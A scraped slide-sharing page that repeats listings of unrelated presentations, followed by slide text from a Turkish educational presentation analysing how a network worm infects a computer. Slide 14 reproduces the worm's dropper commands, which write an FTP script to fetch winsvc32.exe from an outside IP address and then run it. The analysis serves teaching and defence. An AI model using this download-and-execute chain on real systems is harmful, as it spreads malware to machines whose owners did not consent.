Zararlı yazılım tiplerinden biri olan Worm'ların bir bilgisayara nasıl bulaştığı ve sonrasında neler yaptığını adım adım gösteren bir sunumdur. ( A Brief Investigation of a Worm, contact me if english is needed)
DHCP Servisine Yeni Bir Bakış (New Look at DHCP Service)Gökhan AKIN
DHCP servisinnde sorunlar ve bu sorunlara çözüm olabilecek yeni teknikler sunulmaktadır. Ayrıca option 82 ile farklı bir IP dağıtım stratejisine geçilebileceğinden bahsedilmektedir. (Problems of DHCP Services and solution to these problems with new technics, contact me if english is needed)
El fútbol 2.0: El engagement en las Redes Sociales (Febrero 2014) By Álvaro C...Álvaro Cimarra Páramo
El documento describe la creciente importancia de las redes sociales para los clubes de fútbol profesional. Los clubes ahora se comportan como grandes marcas comerciales y generan ingresos significativos a través de la comercialización, los patrocinios y las ventas relacionadas con los fans. El FC Barcelona es actualmente el club deportivo más popular en las redes sociales, con más de 50 millones de seguidores en Facebook y 20 millones en Twitter, y gestiona activamente sus cuentas en varias plataformas para mantener comprometidos a los aficion
El documento describe cómo recibir mensajes electrónicos de amigos cercanos puede mejorar el estado de ánimo y mantener conexiones significativas a pesar de la distancia. El autor ha recibido mensajes positivos de personas de todo el mundo que lo han apoyado y animado. Aunque no se puede sustituir el contacto físico, estos "amigos virtuales" ocupan un lugar importante en su corazón. Los mensajes afectuosos inesperados pueden ser terapéuticos y ayudar a superar los malos momentos.
DHCP Servisine Yeni Bir Bakış (New Look at DHCP Service)Gökhan AKIN
DHCP servisinnde sorunlar ve bu sorunlara çözüm olabilecek yeni teknikler sunulmaktadır. Ayrıca option 82 ile farklı bir IP dağıtım stratejisine geçilebileceğinden bahsedilmektedir. (Problems of DHCP Services and solution to these problems with new technics, contact me if english is needed)
El fútbol 2.0: El engagement en las Redes Sociales (Febrero 2014) By Álvaro C...Álvaro Cimarra Páramo
El documento describe la creciente importancia de las redes sociales para los clubes de fútbol profesional. Los clubes ahora se comportan como grandes marcas comerciales y generan ingresos significativos a través de la comercialización, los patrocinios y las ventas relacionadas con los fans. El FC Barcelona es actualmente el club deportivo más popular en las redes sociales, con más de 50 millones de seguidores en Facebook y 20 millones en Twitter, y gestiona activamente sus cuentas en varias plataformas para mantener comprometidos a los aficion
El documento describe cómo recibir mensajes electrónicos de amigos cercanos puede mejorar el estado de ánimo y mantener conexiones significativas a pesar de la distancia. El autor ha recibido mensajes positivos de personas de todo el mundo que lo han apoyado y animado. Aunque no se puede sustituir el contacto físico, estos "amigos virtuales" ocupan un lugar importante en su corazón. Los mensajes afectuosos inesperados pueden ser terapéuticos y ayudar a superar los malos momentos.
Este documento presenta el trabajo final de evaluación de un estudiante de CEAD Gachetá. Contiene una introducción, justificación, objetivos, descripción de la obra, y desarrollo de las fases del proyecto que incluyen una encuesta, análisis de resultados, perfiles laborales, procedimientos y una matriz de identificación de riesgos. El documento resume el proceso de evaluación de riesgos ocupacionales y gestión de personal para una obra de construcción.
This document lists 109 Windows commands and their functions. It includes commands to access common tools like Control Panel, Calculator, Notepad, as well as system tools to check disks, manage devices, view events, and configure networking, users, and regional settings. The document encourages visiting alltipsfinder.com for more computer and technology tips.
5651 Kanunun cercevesinde kullanıcıların takip edilenbilmesini sağlayanan teknikler, artıları ve eksileri. (Tracking user in your Network) (Sadece IPv4 için / Only for IPv4, IPv6 için olan diğer sunumu inceleyebilirsiniz.)
Petr Hovorka / Trendy ve vývoji pracovních nabídekPetr Hovorka
Na trhu práce se toho zase tak moc nemění. Preference mezi generacemi (X,Y,Z) jsou si velmi podobné. Mění se ale kontext práce a paradigma práce. Firmy to moc nechápou, hledají tajemství ve výzkumech "co chce generace y" apod. a pořád nejčastěji postují inzeráty na pracovních portálech "hledáme/požaduje/nabízíme/pošli_CV".
Este documento habla sobre los fundamentos de SEO (optimización para motores de búsqueda). Explica factores importantes como buen contenido, experiencia de usuario, popularidad web y WPO. También cubre técnicas como usar títulos y descripciones únicas para cada página, encabezados H1-H3, rel="canonical", rel="nofollow", imágenes con texto alternativo, y hacer el sitio accesible e indexable para motores de búsqueda y usuarios. El objetivo final de SEO es que los usuarios encuentren el conten
Jak srozumitelně představit firmu jako zaměstnavatele kandidátům i vlastním zaměstnancům? Začněte BrandBookem, ve kterém shrnete to nejpodstatnější, co by o vás měli vědět.
El documento describe la evolución de los primates y sus hábitos alimenticios y depredadores. Los monos se alimentan principalmente de frutas según la estación y deben moverse para encontrarla, siendo sus patrones de conducta el resultado de sus necesidades, habilidades y hábitat. Viven en regiones forestales pero algunos en sabanas o montañas, existiendo especies arborícolas o terrestres. Son depredados por varios animales según su tamaño y ubicación.
Hedding United Methodist Church is launching a capital campaign called "Sharing the Grace" to increase their annual operating budget and raise $125,000 for building renovations. Their goals are to support worship, mission, and education programs through increased annual giving and restore the church steeple while making other facility improvements. Church members will be invited to learn about the campaign and prayerfully consider a three-year pledge to both the annual operating fund and capital project fund starting in January 2016.
Začněte už od začátku stavět svůj lovebrandLovebrand
Značky, které lidi milují – tedy lovebrandy, nebojují o své zákazníky pouze cenou. A protože konkurence číhá za každým rohem a je těžké se odlišit, měli byste svoji značku začít stavět už od rozjezdu podnikání. Víme, že jako začínající podnikatelé nemáte vysoké rozpočty na marketing, a proto se soustředíme na to, jak vaši značku prodat na webu, Facebooku, Instagramu, skrz newsletter nebo na lokálních akcích. Na semináři vás čekají konkrétní úkoly a díky radám, které si odnesete ve formě praktického přehledu, budete schopni začít nastavovat svou značku hned druhý den.
Všechny další podrobnosti jsou na www.lovebrand.cz/rozjezdy
Bilgisayar virüsü nedir? Nasıl bulaşır? Nasıl önlemler alınmalı?
Yayılma yöntemleri nelerdir? Verdikleri zararlar nelerdir? İşte bu gibi sorularınıza verilecek en güzel cevaplar bu slayttadır.
Eğitim çok önemli.Ağ işletmeni olarak sizlere bilgi vermek istiyorum. TEŞEKKÜR EDERİM.
Este documento presenta el trabajo final de evaluación de un estudiante de CEAD Gachetá. Contiene una introducción, justificación, objetivos, descripción de la obra, y desarrollo de las fases del proyecto que incluyen una encuesta, análisis de resultados, perfiles laborales, procedimientos y una matriz de identificación de riesgos. El documento resume el proceso de evaluación de riesgos ocupacionales y gestión de personal para una obra de construcción.
This document lists 109 Windows commands and their functions. It includes commands to access common tools like Control Panel, Calculator, Notepad, as well as system tools to check disks, manage devices, view events, and configure networking, users, and regional settings. The document encourages visiting alltipsfinder.com for more computer and technology tips.
5651 Kanunun cercevesinde kullanıcıların takip edilenbilmesini sağlayanan teknikler, artıları ve eksileri. (Tracking user in your Network) (Sadece IPv4 için / Only for IPv4, IPv6 için olan diğer sunumu inceleyebilirsiniz.)
Petr Hovorka / Trendy ve vývoji pracovních nabídekPetr Hovorka
Na trhu práce se toho zase tak moc nemění. Preference mezi generacemi (X,Y,Z) jsou si velmi podobné. Mění se ale kontext práce a paradigma práce. Firmy to moc nechápou, hledají tajemství ve výzkumech "co chce generace y" apod. a pořád nejčastěji postují inzeráty na pracovních portálech "hledáme/požaduje/nabízíme/pošli_CV".
Este documento habla sobre los fundamentos de SEO (optimización para motores de búsqueda). Explica factores importantes como buen contenido, experiencia de usuario, popularidad web y WPO. También cubre técnicas como usar títulos y descripciones únicas para cada página, encabezados H1-H3, rel="canonical", rel="nofollow", imágenes con texto alternativo, y hacer el sitio accesible e indexable para motores de búsqueda y usuarios. El objetivo final de SEO es que los usuarios encuentren el conten
Jak srozumitelně představit firmu jako zaměstnavatele kandidátům i vlastním zaměstnancům? Začněte BrandBookem, ve kterém shrnete to nejpodstatnější, co by o vás měli vědět.
El documento describe la evolución de los primates y sus hábitos alimenticios y depredadores. Los monos se alimentan principalmente de frutas según la estación y deben moverse para encontrarla, siendo sus patrones de conducta el resultado de sus necesidades, habilidades y hábitat. Viven en regiones forestales pero algunos en sabanas o montañas, existiendo especies arborícolas o terrestres. Son depredados por varios animales según su tamaño y ubicación.
Hedding United Methodist Church is launching a capital campaign called "Sharing the Grace" to increase their annual operating budget and raise $125,000 for building renovations. Their goals are to support worship, mission, and education programs through increased annual giving and restore the church steeple while making other facility improvements. Church members will be invited to learn about the campaign and prayerfully consider a three-year pledge to both the annual operating fund and capital project fund starting in January 2016.
Začněte už od začátku stavět svůj lovebrandLovebrand
Značky, které lidi milují – tedy lovebrandy, nebojují o své zákazníky pouze cenou. A protože konkurence číhá za každým rohem a je těžké se odlišit, měli byste svoji značku začít stavět už od rozjezdu podnikání. Víme, že jako začínající podnikatelé nemáte vysoké rozpočty na marketing, a proto se soustředíme na to, jak vaši značku prodat na webu, Facebooku, Instagramu, skrz newsletter nebo na lokálních akcích. Na semináři vás čekají konkrétní úkoly a díky radám, které si odnesete ve formě praktického přehledu, budete schopni začít nastavovat svou značku hned druhý den.
Všechny další podrobnosti jsou na www.lovebrand.cz/rozjezdy
Bilgisayar virüsü nedir? Nasıl bulaşır? Nasıl önlemler alınmalı?
Yayılma yöntemleri nelerdir? Verdikleri zararlar nelerdir? İşte bu gibi sorularınıza verilecek en güzel cevaplar bu slayttadır.
Eğitim çok önemli.Ağ işletmeni olarak sizlere bilgi vermek istiyorum. TEŞEKKÜR EDERİM.
5. Worm Nedir?
• Worm, kendi
kopyalarını ya da
parçalarını başka
bilgisayar sistemlerine
yayabilen bir program
ya da program
kümesidir. Yayılma
genellikle ağ
bağlantıları üzerinden
ya da e-posta ekleri
yoluyla gerçekleşir.
12. Buffer Overflow
• “buffer” geçici olarak kullanılan bellek
bölgesine verilen addır. Eğer yanlışlıkla
(veya bilerek…) buffer’a buffer’ın
boyutundan daha fazla veri yazdırırsanız
(buna “buffer overflow” denir) buffer taşar
ve “return address” inin üzerine yazar.
14. İşletilen Komutlar
1- cmd /c: Peşinden gelen dizini komut satırında çalıştır ve daha sonra
pencereyi kapat.
2- Aşağıda belirtilmiş satırları sırası ile “ii” isimli yeni oluşturulan dosyanın içine
yaz.
- echo open 160.75.200.200 7690 >> ii
- echo user 1 1 >> ii
- echo get winsvc32.exe >> ii
- echo bye >> ii
3- ftp -n -v -s:ii : ftp programını aşağıda detayları verilmiş parametreler ile aç.
“-n”: Otomatik kullanıcı adı şifre sorma kısmını atla.
“-v”: Bağlanılan sunucunun yolladığı yazıları atla.
“-s ii” : “ii” isimli dosyadaki komutları çalıştır. Yani 160.75.200.200 isimli
sunucunun 7690inci portuna bağlan, kullanıcı adı şifre olarak 1 ve 1 ver.
Winsvc32.exe isimli dosyayı ftp sunucusunda idir ve ftp programını kapat.
4- del ii : Ftp erisimde kullanılanı ii isimli dosyayı sil.
5- winsvc32.exe : Wormu çalıştır.
18. EXPLOIT
• Yetkisi olmadan daha yetkili bir
kullanıcının (Linux’de root kullanıcısı ,
Windows’da administrator kullanıcısı gibi)
yetkilerine, işletim sistemin zaaflarından
yararlanarak sahip olmayı sağlayan
programlar...
25. Yani Sadece Worm Değil Aynı
Zamanda Bir TRUVA ATI
Bir bilgisayarın
uzaktan kullanıcının
bilgisi haricinde,
kendi amaçları için
yönetilmesini
sağlayan program.
26. Ya da BOT’ta denebilir
Kullanıcının bilgisi
dışında DDoS
salıdırısı
gerçekleştirmek,
SPAM mektup
yollamak vs için
yazılmış yazılımlar.
27. Elimizdeki Worm Kısaca
1. Bir FTP sunucu barındıran
2. Gereken EXPLOIT kodunu barındıran
3. Kendini FTP üzerinde kopyalayan
4. IRC sunucusuna bağlanıp emir alan
bir program.
28. Yeni Worm Yazmak
En kötüsü bir kere programlanmış bir worm daha
sonra kodunda yapılacak çok küçük bir
müdahale ile yeni exploitler için revize edilip
tekrar tehdidini sürdürmeye devam etmektedir.
30. Nasıl Bir Program?
Ama biz worm değil bir Kuş programı yazalım.
Peki Kuş neler yapabilir?
Kurtları yer Yani :
Aynı EXPLOIT’i kullanarak;
Kullanıcı bilgisayarında bir uyarı mesajı çıkartılabilir.
Worm’lanma riski taşıyan bilgisayarların listesini çıkartabilir.
Ve hatta uzaktan gerken güvenlik yamasını bile yapabilir
33. SONUÇ
Wormlar bulaştığı bilgisayardan her türlü
bilgi hırsızlığı yapabildiği gibi:
- Kendini bulaştırmak için yarattıkları trafik
ile de bant genişliğinin israfı
-Ağ cihazlarında gereksiz işlemci yüküne
-Toplu bir DoS atağı yapmaları durumunda
bütün altyapıyı çalımaz hale getirebilir.
34. SONUÇ
Wormlar ile sebep olunan durumlar ciddi bir
ulusal güvenlik sorunu oluşturmaktadır.
Bunun için A.B.D.’de Ulusal CERT kurumlarının
sponsorluğu ile Ulusal Güvenlik Açıkları Veritabanı
oluşturulmuştur.
National Vulnerability Database,
http://nvd.nist.gov/